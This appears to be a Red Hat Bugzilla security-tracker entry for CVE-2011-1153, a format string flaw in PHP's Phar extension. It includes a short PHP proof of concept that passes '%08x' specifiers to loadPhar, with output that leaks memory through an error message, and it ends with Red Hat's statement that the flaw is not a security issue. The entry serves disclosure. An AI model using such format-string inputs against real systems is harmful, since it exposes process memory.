Bug 688378 - (CVE-2011-1153) CVE-2011-1153 php: several format string vulnerabilities in PHP's Phar extension
CVE-2011-1153 php: several format string vulnerabilities in PHP's Phar extension
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
public=20110314,reported=20110314,sou...
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2011-03-16 18:02 EDT by Vincent Danen
Modified: 2015-06-01 10:36 EDT (History)
6 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2011-04-29 18:28:46 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Vincent Danen 2011-03-16 18:02:23 EDT
Several format string flaws were found in PHP's Phar extension [1] that could be used to leak some parts of memory via error messages.  These have been corrected in upstream svn [2].  The Phar extension is part of PHP since 5.3.0.

This is demonstrated with the following:

<?php

$x = new PharData('a.php');
$x->loadPhar("%08x.%08x.%08x.%08x.%08x");

?>

% php phar.php 
PHP Fatal error:  Uncaught exception 'PharException' with message 'unable to open phar for reading "00000000.00000008.00000000.bffb3624.081ef712"' in /tmp/tests/phar.php:4
Stack trace:
#0 /tmp/tests/phar.php(4): PharData::loadPhar('%08x.%08x.%08x....')
#1 {main}
  thrown in /tmp/tests/phar.php on line 4

[1] http://bugs.php.net/bug.php?id=54247
[2] http://svn.php.net/viewvc?view=revision&revision=309221
Comment 1 Vincent Danen 2011-03-16 18:15:07 EDT
I'm not very familiar with these phar archives, but I suspect these would not be something a user could just upload (or a normal site would allow to be uploaded and then loaded), so I believe this flaw is probably more of a local flaw, than a remote flaw.
Comment 11 Vincent Danen 2011-04-29 18:28:46 EDT
Statement:

Red Hat does not consider this flaw to be a security issue.  It is improbable that a script would accept untrusted user input or unvalidated script input data as a PHAR archive file name to load.  The file name passed to the PHAR-handling functions is therefore under the full control of the script author and no trust boundary is crossed.

Note You need to log in before you can comment on or make changes to this bug.